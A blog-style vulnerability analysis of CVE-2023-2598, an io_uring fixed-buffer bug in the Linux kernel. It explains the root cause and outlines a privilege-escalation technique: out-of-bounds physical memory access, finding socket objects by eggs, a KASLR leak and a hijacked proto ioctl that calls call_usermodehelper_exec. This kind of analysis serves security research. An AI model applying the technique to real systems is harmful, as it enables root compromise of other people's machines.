a place of anatomical precision

Conquering the memory through io_uring - Analysis of CVE-2023-2598

2023-11-17T14:00:00+00:00

Two months ago, I decided to look into the io_uring subsystem of the Linux Kernel.

Eventually, I stumbled upon an email disclosing a vulnerability within io_uring. The email’s subject was “Linux kernel io_uring out-of-bounds access to physical memory”. It immediately piqued my interest.

I had to put my research on pause as preparation for this year’s European Cyber Security Challenge was sucking up most of my free time. Anyway, now that ECSC is over, I was able to look into it and decided to do a write-up of this powerful vulnerability.

The io_uring subsystem in a nutshell
Vulnerability
- Root Cause
  - Understanding page folios
Exploitation
Acknowledgements

The io_uring subsystem in a nutshell

I will try to provide a very short and basic introduction to the io_uring subsystem and its most integral components.

I recommend reading Chompie’s amazing introduction to the subsystem if you want to get a more complete idea of how io_uring works.

What is io_uring?

In a nutshell, io_uring is a Linux API that lets applications perform “system calls” asynchronously. It can provide significant performance improvements over normal syscalls: your program does not have to wait on blocking syscalls and, because of how io_uring is implemented, the number of actual syscalls that need to be performed drops as well.

Submission and Completion Queues

At the core of every io_uring implementation sit two ring buffers - the submission queue (SQ) and the completion queue (CQ). Those ring buffers are shared between the application and the kernel.

The application places Submission Queue Entries (SQEs) in the submission queue, each describing a syscall it wants performed. It then performs an io_uring_enter syscall to tell the kernel that there is work waiting in the submission queue.

It is even possible to set up submission queue polling that eliminates the need to use io_uring_enter, reducing the number of real syscalls needed to be performed to 0.

After the kernel performs the operation it puts a Completion Queue Entry (CQE) into the completion queue ring buffer which can then be consumed by the application.
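
To make the queue mechanics concrete, here is a minimal single-threaded model of such a ring, assuming a power-of-two size and free-running head/tail counters. All names (model_ring, ring_push, ring_pop) are hypothetical and not part of io_uring; the real rings live in memory shared with the kernel and additionally need memory barriers.

```c
#include <assert.h>
#include <stdint.h>

#define RING_ENTRIES 8u                 /* must be a power of two */
#define RING_MASK (RING_ENTRIES - 1u)

/* Hypothetical stand-in for an SQE/CQE payload. */
struct model_entry {
	uint64_t user_data;
};

struct model_ring {
	uint32_t head;                  /* next slot the consumer reads */
	uint32_t tail;                  /* next slot the producer writes */
	struct model_entry entries[RING_ENTRIES];
};

/* Producer side: returns 0 on success, -1 if the ring is full. */
static int ring_push(struct model_ring *r, struct model_entry e)
{
	if (r->tail - r->head == RING_ENTRIES)
		return -1;
	r->entries[r->tail & RING_MASK] = e;
	r->tail++;
	return 0;
}

/* Consumer side: returns 0 on success, -1 if the ring is empty. */
static int ring_pop(struct model_ring *r, struct model_entry *out)
{
	if (r->head == r->tail)
		return -1;
	*out = r->entries[r->head & RING_MASK];
	r->head++;
	return 0;
}
```

In this model the application would be the producer of the submission ring and the consumer of the completion ring, with the kernel playing the opposite roles.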

Fixed buffers

You can register fixed buffers to be used by operations that read or write data. The pages that those buffers span will be pinned and mapped for use, avoiding future copies to and from user space.

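Registration of buffers happens through the io_uring_register syscall with the IORING_REGISTER_BUFFERS operation. A registered buffer is then referenced by its index from the fixed variants of the read and write operations (IORING_OP_READ_FIXED and IORING_OP_WRITE_FIXED); the IOSQE_BUFFER_SELECT SQE flag belongs to the separate provided-buffers mechanism. For an example use case, check this out.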

As fixed buffers are the protagonist of our story, we will see more of them later.

liburing

Thankfully there is a library that provides helpers for setting up io_uring instances and interacting with the subsystem - liburing. It simplifies operations such as setting up buffers, producing SQEs, collecting CQEs, and so on.

It provides a simplified interface to io_uring that developers (including exploit developers) can use to make their lives easier.

As liburing is maintained by Jens Axboe, the maintainer of io_uring, it can be relied upon to be up-to-date with the kernel-side changes.

Vulnerability

A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer.

The vulnerability was introduced in version 6.3-rc1 (commit 57bebf807e2a) and was patched in 6.4-rc1 (commit 776617db78c6).

Root Cause

The root cause of the vulnerability is a faulty optimization when buffers are registered.

Buffers get registered through an io_uring_register system call by passing the IORING_REGISTER_BUFFERS opcode. This invokes io_sqe_buffers_register, which in turn calls io_sqe_buffer_register to register each of the buffers. This is where the vulnerability arises.

/* io_uring/rsrc.c */
static int io_sqe_buffer_register(struct io_ring_ctx *ctx, struct iovec *iov,
				  struct io_mapped_ubuf **pimu,
				  struct page **last_hpage)
{
	struct io_mapped_ubuf *imu = NULL;
	struct page **pages = NULL; // important to remember: *struct page* refers to physical pages
	unsigned long off;
	size_t size;
	int ret, nr_pages, i;
	struct folio *folio = NULL;

	*pimu = ctx->dummy_ubuf;
	if (!iov->iov_base) // if base is NULL
		return 0;

	ret = -ENOMEM;
	pages = io_pin_pages((unsigned long) iov->iov_base, iov->iov_len,
				&nr_pages); // pins the pages that the iov occupies
	// returns a pointer to an array of *page* pointers 
	// and sets nr_pages to the number of pinned pages
	if (IS_ERR(pages)) {
		ret = PTR_ERR(pages);
		pages = NULL;
		goto done;
	}
    ...

Let’s first make clear what our “building blocks” are and what they are used for.

The function takes four arguments - the context, an iovec pointer, an io_mapped_ubuf pointer and a pointer to last_hpage (this value is always NULL).

An iovec is just a structure that describes a buffer, with the start address of the buffer and its length. Nothing more.

struct iovec
{
	void __user *iov_base;	// the address at which the buffer starts
	__kernel_size_t iov_len; // the length of the buffer in bytes
};

When we pass a buffer to be registered, we pass it as an iovec. The *iov pointer in this function points to a structure containing information about the buffer that the user wants to register.

An io_mapped_ubuf is a structure that holds the information about a buffer that has been registered to an io_uring instance.

struct io_mapped_ubuf {
	u64		ubuf; // the address at which the buffer starts
	u64		ubuf_end; // the address at which it ends
	unsigned int	nr_bvecs; // how many bio_vec(s) are needed to address the buffer 
	unsigned long	acct_pages;
	struct bio_vec	bvec[]; // array of bio_vec(s)
};

The last member of io_mapped_ubuf is an array of bio_vec(s). A bio_vec is kind of like an iovec but for physical memory. It defines a contiguous range of physical memory addresses.

struct bio_vec {
	struct page	*bv_page; // the first page associated with the address range
	unsigned int	bv_len; // length of the range (in bytes)
	unsigned int	bv_offset; // start of the address range relative to the start of bv_page
};

And struct page is of course just a structure describing a physical page of memory.

In the code snippet above, the pages that the iov spans get pinned to memory ensuring they stay in the main memory and are exempt from paging. An array pages is returned that contains pointers to the struct page(s) that the iov spans and nr_pages gets set to the number of pages.
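
How many pages a given iov spans follows from simple address arithmetic. The sketch below is a user-space model of that calculation, assuming 4 KiB pages; MODEL_PAGE_SHIFT and pages_spanned are hypothetical names, not kernel identifiers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_PAGE_SHIFT 12                        /* assumes 4 KiB pages */
#define MODEL_PAGE_SIZE  (1UL << MODEL_PAGE_SHIFT)

/* Number of pages touched by the byte range [base, base + len). */
static unsigned long pages_spanned(uintptr_t base, size_t len)
{
	uintptr_t first = base >> MODEL_PAGE_SHIFT;
	uintptr_t end = (base + len + MODEL_PAGE_SIZE - 1) >> MODEL_PAGE_SHIFT;

	return (unsigned long)(end - first);
}
```

Note that a short buffer can still span two pages when it straddles a page boundary, for example 32 bytes starting at 0x1ff0.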

Let’s now continue with io_sqe_buffer_register.

    ...
	/* If it's a huge page, try to coalesce them into a single bvec entry */
	if (nr_pages > 1) { // if more than one page
		folio = page_folio(pages[0]); // converts from page to folio
		// returns the folio that contains this page
		for (i = 1; i < nr_pages; i++) {
			if (page_folio(pages[i]) != folio) { // different folios -> not physically contiguous 
				folio = NULL; // set folio to NULL as we cannot coalesce into a single entry
				break;
			}
		}
		if (folio) { // if all the pages are in the same folio
			folio_put_refs(folio, nr_pages - 1); 
			nr_pages = 1; // sets nr_pages to 1 as it can be represented as a single folio page
		}
	}
    ...

Here, if the iov spans more than a single physical page, the kernel will loop through pages to check if they belong to the same folio. But what even is a folio?

Understanding page folios

To understand what a folio is we need to first understand what a page really is according to the kernel. Usually by a page people mean the smallest block of physical memory which can be mapped by the kernel (most commonly 4096 bytes but might be larger). Well, that isn’t really what a page is in the context of the kernel. The definition has been expanded to include compound pages which are multiple contiguous single pages - which makes things confusing.

Compound pages have a “head page” that holds the information about the compound page and is marked to make clear the nature of the compound page. All the “tail pages” are marked as such and contain a pointer to the “head page”. But that creates a problematic ambiguity - if a page pointer for a tail page is passed to a function, is the function supposed to act on just that singular page or the whole compound page?

So to address this confusion the concept of “page folios” was introduced. A “page folio” is essentially a page that is guaranteed to not be a tail page. This clears up the ambiguity, as functions that are not meant to operate on singular tail pages will take a struct folio * as an argument instead of a struct page *.

struct folio {
       struct page page;
};

The folio structure is just a wrapper around page. It should be noted that every page is a part of a folio. A non-compound page’s “page folio” is the page itself. Now that we know what a page folio is, we can dissect the code above.

The code above is meant to identify if the pages that the buffer being registered spans are part of a single compound page. It iterates through the pages and checks if their folio is the same. If so it sets the number of pages nr_pages to 1 and sets the folio variable. Now here comes the issue…

The code that checks if the pages are from the same folio doesn’t actually check if they are consecutive. It can be the same page mapped multiple times. During the iteration page_folio(page) would return the same folio again and again passing the checks. This is an obvious logic bug. Let’s continue with io_sqe_buffer_register and see what the fallout is.
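
The difference between "same folio" and "same folio and consecutive" can be shown with a small user-space model. Everything here is hypothetical scaffolding (model_page, the pfn and folio_id fields, both function names); it only mimics the shape of the check, with the strict variant adding the consecutiveness requirement that the flawed loop lacks.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of a pinned page: its frame number and owning folio. */
struct model_page {
	unsigned long pfn;
	unsigned long folio_id;
};

/* The flawed check: only asks whether every page belongs to the same folio. */
static bool can_coalesce_buggy(const struct model_page *pages, size_t n)
{
	for (size_t i = 1; i < n; i++)
		if (pages[i].folio_id != pages[0].folio_id)
			return false;
	return n > 1;
}

/* A stricter check: same folio and physically consecutive frames. */
static bool can_coalesce_strict(const struct model_page *pages, size_t n)
{
	for (size_t i = 1; i < n; i++)
		if (pages[i].folio_id != pages[0].folio_id ||
		    pages[i].pfn != pages[i - 1].pfn + 1)
			return false;
	return n > 1;
}
```

Feeding both functions an array in which the same frame appears three times makes the flawed check accept it, while the strict one rejects it; a genuine run of consecutive frames from one folio passes both.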

    ...
	imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL); 
	// allocates imu with an array for nr_pages bio_vec(s)
	// bio_vec - a contiguous range of physical memory addresses
	// we need a bio_vec for each (physical) page
    // in the case of a folio - the array of bio_vec(s) will be of size 1
	if (!imu)
		goto done;

	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
	if (ret) {
		unpin_user_pages(pages, nr_pages);
		goto done;
	}

	off = (unsigned long) iov->iov_base & ~PAGE_MASK;
	size = iov->iov_len; // sets the size to that passed by the user!
	/* store original address for later verification */
	imu->ubuf = (unsigned long) iov->iov_base; // user-controlled
	imu->ubuf_end = imu->ubuf + iov->iov_len; // calculates the end based on the length
	imu->nr_bvecs = nr_pages; // this would be 1 in the case of folio
	*pimu = imu;
	ret = 0;

	if (folio) { // in case of folio - we need just a single bio_vec (efficient!)
		bvec_set_page(&imu->bvec[0], pages[0], size, off);
		goto done;
	}
	for (i = 0; i < nr_pages; i++) { 
		size_t vec_len;

		vec_len = min_t(size_t, size, PAGE_SIZE - off);
		bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
		off = 0;
		size -= vec_len;
	}
done:
	if (ret)
		kvfree(imu);
	kvfree(pages);
	return ret;
}

A single bio_vec is allocated, as nr_pages = 1. The buffer size recorded in imu->ubuf_end and imu->bvec[0].bv_len is derived from the length passed by the user in iov->iov_len.
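
For contrast, the per-page path of the listing above can be modelled in user space. This is a sketch assuming 4 KiB pages; model_bvec and split_per_page are hypothetical names, and a page index stands in for the struct page pointer.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096UL   /* assumes 4 KiB pages */

/* Hypothetical stand-in for struct bio_vec, with a page index instead of a pointer. */
struct model_bvec {
	size_t page_index;
	size_t len;
	size_t offset;
};

/*
 * Split a buffer that starts `off` bytes into its first page and is `size`
 * bytes long into one entry per page. Returns the number of entries written.
 */
static size_t split_per_page(size_t off, size_t size,
			     struct model_bvec *out, size_t max)
{
	size_t i = 0;

	while (size > 0 && i < max) {
		size_t room = MODEL_PAGE_SIZE - off;
		size_t vec_len = size < room ? size : room;

		out[i].page_index = i;
		out[i].len = vec_len;
		out[i].offset = off;
		off = 0;               /* only the first page can start mid-page */
		size -= vec_len;
		i++;
	}
	return i;
}
```

On this path no entry ever describes more than one page. The coalesced path instead emits a single entry whose length is the whole buffer, which is only sound when the pages behind it really are physically consecutive.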

Exploitation

Now that our logic bug is clear let’s see how it can be exploited.

An Incredible Primitive

Let’s now imagine that we are registering a buffer that spans multiple virtual pages, but each of them is the same physical page mapped again and again. This buffer is virtually contiguous, but it isn’t physically contiguous. When the buffer goes through the faulty code that checks if the pages belong to a compound page, it will pass the check, fooling the kernel into believing that the buffer spans multiple pages of a compound page while in reality it is backed by a single page.

This means that imu->bvec[0].bv_len will be set to the virtual length of the buffer because the kernel believes that the virtually contiguous memory is backed by physically contiguous memory. As we established, bio_vec(s) deal with physical ranges of memory. This buffer will be registered and give us access to the physical pages following the one that was mapped to construct the buffer.

We can register a buffer spanning n virtual pages but a single physical one. After registering this buffer we can use io_uring operations to read from the buffer as well as write to it - giving us out-of-bounds access to n-1 physical pages. Here n could be as high as the limit set for mappings allowed to a single userland process. We have a multi-page out-of-bounds read and write.

This is an incredibly powerful primitive, perhaps even the most powerful I have seen yet.

Target Objects

We are looking for target objects that allow us to leak KASLR and get some kind of code execution.

Thankfully, as we have an OOB read and write to whole physical pages, we don’t have any limits on the objects themselves: we don’t care what slab they use, what their size is or anything like that.

We do however have some requirements. We need to be able to find our target objects and identify them. We will be leaking thousands of pages and we need to be able to find our needle(s) in the haystack. That means we must be able to place an egg inside the object itself, which we can later use to identify it.

Sockets

Here sockets are our friends. They are pretty massive objects containing both user-controlled fields, which can be used to place an egg, and function pointers, which can be used to leak KASLR.

struct sock {
	struct sock_common         __sk_common;          /*     0   136 */
	/* --- cacheline 2 boundary (128 bytes) was 8 bytes ago --- */
	struct dst_entry *         sk_rx_dst;            /*   136     8 */
	int                        sk_rx_dst_ifindex;    /*   144     4 */
	u32                        sk_rx_dst_cookie;     /*   148     4 */
	socket_lock_t              sk_lock;              /*   152    32 */
	atomic_t                   sk_drops;             /*   184     4 */
	int                        sk_rcvlowat;          /*   188     4 */
	/* --- cacheline 3 boundary (192 bytes) --- */
	struct sk_buff_head        sk_error_queue;       /*   192    24 */
	struct sk_buff_head        sk_receive_queue;     /*   216    24 */
	struct {
		atomic_t           rmem_alloc;           /*   240     4 */
		int                len;                  /*   244     4 */
		struct sk_buff *   head;                 /*   248     8 */
		/* --- cacheline 4 boundary (256 bytes) --- */
		struct sk_buff *   tail;                 /*   256     8 */
	} sk_backlog;                                    /*   240    24 */
	int                        sk_forward_alloc;     /*   264     4 */
	u32                        sk_reserved_mem;      /*   268     4 */
	unsigned int               sk_ll_usec;           /*   272     4 */
	unsigned int               sk_napi_id;           /*   276     4 */
	int                        sk_rcvbuf;            /*   280     4 */

	/* XXX 4 bytes hole, try to pack */

	struct sk_filter *         sk_filter;            /*   288     8 */
	union {
		struct socket_wq * sk_wq;                /*   296     8 */
		struct socket_wq * sk_wq_raw;            /*   296     8 */
	};                                               /*   296     8 */
	struct xfrm_policy *       sk_policy[2];         /*   304    16 */
	/* --- cacheline 5 boundary (320 bytes) --- */
	struct dst_entry *         sk_dst_cache;         /*   320     8 */
	atomic_t                   sk_omem_alloc;        /*   328     4 */
	int                        sk_sndbuf;            /*   332     4 */
	int                        sk_wmem_queued;       /*   336     4 */
	refcount_t                 sk_wmem_alloc;        /*   340     4 */
	long unsigned int          sk_tsq_flags;         /*   344     8 */
	union {
		struct sk_buff *   sk_send_head;         /*   352     8 */
		struct rb_root     tcp_rtx_queue;        /*   352     8 */
	};                                               /*   352     8 */
	struct sk_buff_head        sk_write_queue;       /*   360    24 */
	/* --- cacheline 6 boundary (384 bytes) --- */
	__s32                      sk_peek_off;          /*   384     4 */
	int                        sk_write_pending;     /*   388     4 */
	__u32                      sk_dst_pending_confirm; /*   392     4 */
	u32                        sk_pacing_status;     /*   396     4 */
	long int                   sk_sndtimeo;          /*   400     8 */
	struct timer_list          sk_timer;             /*   408    40 */

	/* XXX last struct has 4 bytes of padding */

	/* --- cacheline 7 boundary (448 bytes) --- */
	__u32                      sk_priority;          /*   448     4 */
	__u32                      sk_mark;              /*   452     4 */
	long unsigned int          sk_pacing_rate;       /*   456     8 */
	long unsigned int          sk_max_pacing_rate;   /*   464     8 */
    // .. many more fields
	/* size: 760, cachelines: 12, members: 92 */
	/* sum members: 754, holes: 1, sum holes: 4 */
	/* sum bitfield members: 16 bits (2 bytes) */
	/* paddings: 2, sum paddings: 6 */
	/* forced alignments: 1 */
	/* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));

Taking a look at sk_setsockopt in net/core/sock.c we can see what fields of the sock structure we can set.

Some fields we could potentially set like sk_mark would require us to drop into a network namespace to obtain CAP_NET_ADMIN. Thankfully there are some options that don’t have such requirements to set them.

Some good options that we could utilize are SO_MAX_PACING_RATE (sets sk_max_pacing_rate), SO_SNDBUF (sets sk_sndbuf) and SO_RCVBUF (sets sk_rcvbuf).

Two eggs

Here perhaps the best option that we could pick is SO_MAX_PACING_RATE. It has one obvious advantage - we can use it to place two eggs, one at sk_max_pacing_rate and one at sk_pacing_rate. When the option SO_MAX_PACING_RATE is being set, the value of sk_pacing_rate is set to the new value of sk_max_pacing_rate if it is lower than the current value of sk_pacing_rate. Looking at the function sock_init_data_uid we see that sk_pacing_rate is initialized to ~0UL = 0xffffffffffffffff.

The obvious question is - why would we need two eggs? As we are leaking many pages, we could meet our egg outside the context of a sock object. I tested it and indeed sometimes the first egg found was not one inside a sock object. By looking for two eggs at a fixed distance from one another, we ensure that the matches we find are the sock objects we are looking for.
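
The two-egg test boils down to a scan for a pair of values at a fixed distance. Below is a minimal sketch over an ordinary byte buffer; find_egg_pair and its parameters are hypothetical names, and the 8-byte stride assumes both fields are 8-byte aligned, as sk_pacing_rate (offset 456) and sk_max_pacing_rate (offset 464) are in the listing above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scan `buf` for `egg_a` with `egg_b` located `gap` bytes after it.
 * Returns the byte offset of egg_a, or -1 if no such pair exists.
 */
static long find_egg_pair(const unsigned char *buf, size_t len,
			  uint64_t egg_a, uint64_t egg_b, size_t gap)
{
	if (len < gap + sizeof(uint64_t))
		return -1;

	for (size_t off = 0; off + gap + sizeof(uint64_t) <= len; off += 8) {
		uint64_t a, b;

		memcpy(&a, buf + off, sizeof(a));
		memcpy(&b, buf + off + gap, sizeof(b));
		if (a == egg_a && b == egg_b)
			return (long)off;
	}
	return -1;
}
```

A lone occurrence of the egg value is ignored; only a match on both positions counts, which is what filters out stray copies of the value elsewhere in memory.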

Identifying the sockets

We want to have a way to identify which socket we have found in memory. We can do that through the SO_SNDBUF option by storing the file descriptor of the socket in it. In reality, we have to kind of “encode” the value by doing fd + SOCK_MIN_SNDBUF and “decode” it on read by doing val / 2 - SOCK_MIN_SNDBUF.

The value of SOCK_MIN_SNDBUF is calculated using the following formula: 2 * (2048 + ALIGN(sizeof(struct sk_buff), 1 << L1_CACHE_SHIFT)). The exact value depends on L1_CACHE_SHIFT. In my case L1_CACHE_SHIFT = 6, therefore SOCK_MIN_SNDBUF = 4608.
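
As a worked example of that arithmetic, the sketch below recomputes the constant and round-trips a file descriptor through the encoding. The sk_buff size of 232 bytes is an assumption for illustration (any size from 193 to 256 bytes rounds up to 256 and gives the same result), and all MODEL_ names and both helpers are hypothetical. The doubling in the test mirrors the division by two in the decode step described above.

```c
#include <assert.h>

#define MODEL_L1_CACHE_BYTES 64          /* 1 << L1_CACHE_SHIFT with shift 6 */
#define MODEL_SKB_SIZE       232         /* assumed sizeof(struct sk_buff) */

/* Round x up to a multiple of a (a must be a power of two). */
#define MODEL_ALIGN(x, a) (((x) + (a) - 1) & ~((a) - 1))

#define MODEL_SOCK_MIN_SNDBUF \
	(2 * (2048 + MODEL_ALIGN(MODEL_SKB_SIZE, MODEL_L1_CACHE_BYTES)))

/* Value handed to setsockopt(SO_SNDBUF) to tag a socket with its fd. */
static int encode_fd(int fd)
{
	return fd + MODEL_SOCK_MIN_SNDBUF;
}

/* Recover the fd from the sk_sndbuf value read back out of memory. */
static int decode_fd(int sk_sndbuf)
{
	return sk_sndbuf / 2 - MODEL_SOCK_MIN_SNDBUF;
}
```

With these numbers, 2 * (2048 + 256) = 4608, and a socket tagged with fd 7 would carry 2 * (7 + 4608) = 9230 in sk_sndbuf, which decodes back to 7.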

Leaking KASLR

At the end of struct sock, there are quite a few function pointers.

struct sock {
    ...
	void                       (*sk_state_change)(struct sock *); /*   672     8 */
	void                       (*sk_data_ready)(struct sock *); /*   680     8 */
	void                       (*sk_write_space)(struct sock *); /*   688     8 */
	void                       (*sk_error_report)(struct sock *); /*   696     8 */
	/* --- cacheline 11 boundary (704 bytes) --- */
	int                        (*sk_backlog_rcv)(struct sock *, struct sk_buff *); /*   704     8 */
	void                       (*sk_destruct)(struct sock *); /*   712     8 */
    ...
} __attribute__((__aligned__(8)));

Leaking any of them is sufficient to defeat KASLR. For a TCP socket, they will be set to the following functions:

sk_state_change <-> ,
sk_data_ready <-> ,
sk_write_space <-> ,
sk_error_report <-> ,
sk_backlog_rcv <-> ,
sk_destruct <-> 
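
Turning one leaked pointer into the kernel base is a single subtraction, after which any other symbol can be relocated. The sketch below uses made-up addresses and offsets purely for illustration; the helper names are hypothetical, and real offsets would have to come from the symbol table of the exact kernel build in question.

```c
#include <assert.h>
#include <stdint.h>

/* Base = runtime address of a known symbol minus its offset in the image. */
static uint64_t kernel_base_from_leak(uint64_t leaked_addr,
				      uint64_t symbol_offset)
{
	return leaked_addr - symbol_offset;
}

/* Runtime address of any other symbol once the base is known. */
static uint64_t relocate_symbol(uint64_t kernel_base, uint64_t symbol_offset)
{
	return kernel_base + symbol_offset;
}
```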

Privilege Escalation

Our ultimate goal is to achieve privilege escalation. With KASLR out of the way, we can move towards it.

As we already have control over a sock object we can use the same object to escalate. The first member of the sock object is struct sock_common which is the minimal network layer representation of sockets in the kernel.

struct sock_common {
	union {
		__addrpair         skc_addrpair;         /*     0     8 */
		struct {
			__be32     skc_daddr;            /*     0     4 */
			__be32     skc_rcv_saddr;        /*     4     4 */
		};                                       /*     0     8 */
	};                                               /*     0     8 */
	union {
		unsigned int       skc_hash;             /*     8     4 */
		__u16              skc_u16hashes[2];     /*     8     4 */
	};                                               /*     8     4 */
	union {
		__portpair         skc_portpair;         /*    12     4 */
		struct {
			__be16     skc_dport;            /*    12     2 */
			__u16      skc_num;              /*    14     2 */
		};                                       /*    12     4 */
	};                                               /*    12     4 */
	short unsigned int         skc_family;           /*    16     2 */
	volatile unsigned char     skc_state;            /*    18     1 */
	unsigned char              skc_reuse:4;          /*    19: 0  1 */
	unsigned char              skc_reuseport:1;      /*    19: 4  1 */
	unsigned char              skc_ipv6only:1;       /*    19: 5  1 */
	unsigned char              skc_net_refcnt:1;     /*    19: 6  1 */

	/* XXX 1 bit hole, try to pack */

	int                        skc_bound_dev_if;     /*    20     4 */
	union {
		struct hlist_node  skc_bind_node;        /*    24    16 */
		struct hlist_node  skc_portaddr_node;    /*    24    16 */
	};                                               /*    24    16 */
	struct proto *             skc_prot;             /*    40     8 */

	...

	/* size: 136, cachelines: 3, members: 25 */
	/* sum members: 135 */
	/* sum bitfield members: 7 bits, bit holes: 1, sum bit holes: 1 bits */
	/* last cacheline: 8 bytes */
};

We can see at offset 40 bytes from its start, a pointer to a struct proto object. A proto object describes how operations should be handled at the transport layer. It is primarily a collection of function pointers.

struct proto {
	void                       (*close)(struct sock *, long int); /*     0     8 */
	int                        (*pre_connect)(struct sock *, struct sockaddr *, int); /*     8     8 */
	int                        (*connect)(struct sock *, struct sockaddr *, int); /*    16     8 */
	int                        (*disconnect)(struct sock *, int); /*    24     8 */
	struct sock *              (*accept)(struct sock *, int, int *, bool); /*    32     8 */
	int                        (*ioctl)(struct sock *, int, long unsigned int); /*    40     8 */
	int                        (*init)(struct sock *); /*    48     8 */
	void                       (*destroy)(struct sock *); /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	void                       (*shutdown)(struct sock *, int); /*    64     8 */
	int                        (*setsockopt)(struct sock *, int, int, sockptr_t, unsigned int); /*    72     8 */
	int                        (*getsockopt)(struct sock *, int, int, char *, int *); /*    80     8 */

	...

	/* size: 432, cachelines: 7, members: 54 */
	/* sum members: 425, holes: 2, sum holes: 7 */
	/* last cacheline: 48 bytes */
};

Here we have quite a few candidates but the one we are really interested in is the ioctl. By writing our “gadget” to ioctl we will be able to invoke it by just invoking an ioctl call to the socket.

However, in order to write our gadget at proto->ioctl we first need to set up a fake proto object. This is easy enough: we can write it below our sock object. To do this safely, we need to ensure that we aren’t overwriting anything we shouldn’t be right after the sock object.

Making the sockets TCP sockets (tcp_sock), for example, gives us quite a bit of leeway.

Peeling back tcp_sock

tcp_sock is the top-level object.
struct inet_connection_sock inet_conn is the first member of tcp_sock
struct inet_sock icsk_inet is the first member of inet_connection_sock
struct sock sk is the first member of inet_sock

So in memory, stuff is set up the following way:

--- sock @0
----- inet_sock 
------ inet_connection_sock 
------- tcp_sock @1400

In total tcp_sock is of size 2208 bytes (on v6.3-rc1).
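
The nesting works because each structure embeds the previous one as its first member, so all four views share one start address. A small model with placeholder sizes illustrates this; only the 760-byte size of sock comes from the listing above, the other field sizes and all model_ names are made up.

```c
#include <assert.h>
#include <stddef.h>

struct model_sock {
	char bytes[760];                 /* size of struct sock per the listing above */
};

struct model_inet_sock {
	struct model_sock sk;            /* first member */
	char inet_fields[64];            /* placeholder size */
};

struct model_inet_connection_sock {
	struct model_inet_sock icsk_inet; /* first member */
	char icsk_fields[64];             /* placeholder size */
};

struct model_tcp_sock {
	struct model_inet_connection_sock inet_conn; /* first member */
	char tcp_fields[64];                          /* placeholder size */
};

/* Walking down through the first members never moves the address. */
static struct model_sock *model_sk_from_tcp(struct model_tcp_sock *tp)
{
	return &tp->inet_conn.icsk_inet.sk;
}
```

Everything past the first 760 bytes of such an object belongs to the outer layers, which is the space the text refers to as being below sock proper.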

We have the freedom to place our fake proto object below sock proper, writing over the inet_sock. After making our ioctl call we only need to restore the tcp_sock to its initial state, so as to not accidentally panic the kernel when the socket gets destroyed.

call_usermodehelper_exec

A very clean gadget that we could use is call_usermodehelper_exec. It allows us to start a user-mode process from kernel space. It takes two arguments - (struct subprocess_info *sub_info, int wait).

Looking at struct proto we can see that the ioctl is defined as (*ioctl)(struct sock *, int, long unsigned int);. We cannot control sub_info - it will always be a pointer to our sock object.

So now the question is - are we able to write a fake subprocess_info object over the beginning of our socket without breaking it?

struct subprocess_info {
	struct work_struct         work;                 /*     0    32 */
	struct completion *        complete;             /*    32     8 */
	const char  *              path;                 /*    40     8 */
	char * *                   argv;                 /*    48     8 */
	char * *                   envp;                 /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	int                        wait;                 /*    64     4 */
	int                        retval;               /*    68     4 */
	int                        (*init)(struct subprocess_info *, struct cred *); /*    72     8 */
	void                       (*cleanup)(struct subprocess_info *); /*    80     8 */
	void *                     data;                 /*    88     8 */

	/* size: 96, cachelines: 2, members: 10 */
	/* last cacheline: 32 bytes */
};

The first member of subprocess_info is a work_struct - an object that describes deferred work. Then we have parameters like path which holds a pointer to the path of our executable, argv which is a pointer to the array of pointers to each of the arguments and envp which is the same but for environment variables. The function pointer init holds the function that will be called on initialization to set up the credentials of the process - if it is set to null, it will start with the credentials of system workqueues (as root). Likewise, if cleanup is set, it gets executed after the subprocess exits.

Overlapping subprocess_info

As we established, our subprocess_info will need to overlap with the start of the sock object as the first argument of the ioctl is sock *. However, the first 136 bytes of struct sock are occupied by struct sock_common.

struct sock[sock_common]      | subprocess_info
============================================================
0x0: skc_addrpair             | work.data
0x8: skc_hash, skc_u16hashes  | work.entry.next
0x10: skc_portpair, ..., ...  | work.entry.prev
0x18: skc_bind_node[0:7]      | work.func
0x20: skc_bind_node[8:15]     | complete
0x28: skc_prot (struct proto) | path
0x30: skc_net                 | argv
0x38: skc_v6_daddr            | envp
0x40: *padding*               | wait, retval
0x48: skc_v6_rcv_saddr[0:7]   | *init
0x50: skc_v6_rcv_saddr[8:15]  | *cleanup
0x58: skc_cookie              | data
============================================================

As we see the value of skc_prot overlaps with path. If we set path to anything else we will be overwriting skc_prot which will break our exploit as we need skc_prot to point to our fake proto structure at the end of sock proper. So, can we overlap path with the start of our proto structure?
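
The overlap in the table can be double-checked mechanically with offsetof. The structures below are hypothetical mock-ups that only reproduce the field sizes from the pahole listings above (pointers are modelled as 64-bit integers); they are not the kernel definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct model_work_struct {
	uint64_t data;                 /* 0x00 */
	uint64_t entry_next;           /* 0x08 */
	uint64_t entry_prev;           /* 0x10 */
	uint64_t func;                 /* 0x18 */
};

struct model_subprocess_info {
	struct model_work_struct work; /* 0x00 */
	uint64_t complete;             /* 0x20 */
	uint64_t path;                 /* 0x28 */
	uint64_t argv;                 /* 0x30 */
	uint64_t envp;                 /* 0x38 */
	int32_t wait;                  /* 0x40 */
	int32_t retval;                /* 0x44 */
	uint64_t init;                 /* 0x48 */
	uint64_t cleanup;              /* 0x50 */
	uint64_t data;                 /* 0x58 */
};

/* Only the first 48 bytes of sock_common matter for this check. */
struct model_sock_common_head {
	uint8_t before_prot[40];       /* skc_addrpair .. skc_bind_node */
	uint64_t skc_prot;             /* 0x28 */
};

/* Fails to compile if path and skc_prot do not share an offset. */
_Static_assert(offsetof(struct model_subprocess_info, path) ==
	       offsetof(struct model_sock_common_head, skc_prot),
	       "path must overlap skc_prot");
```

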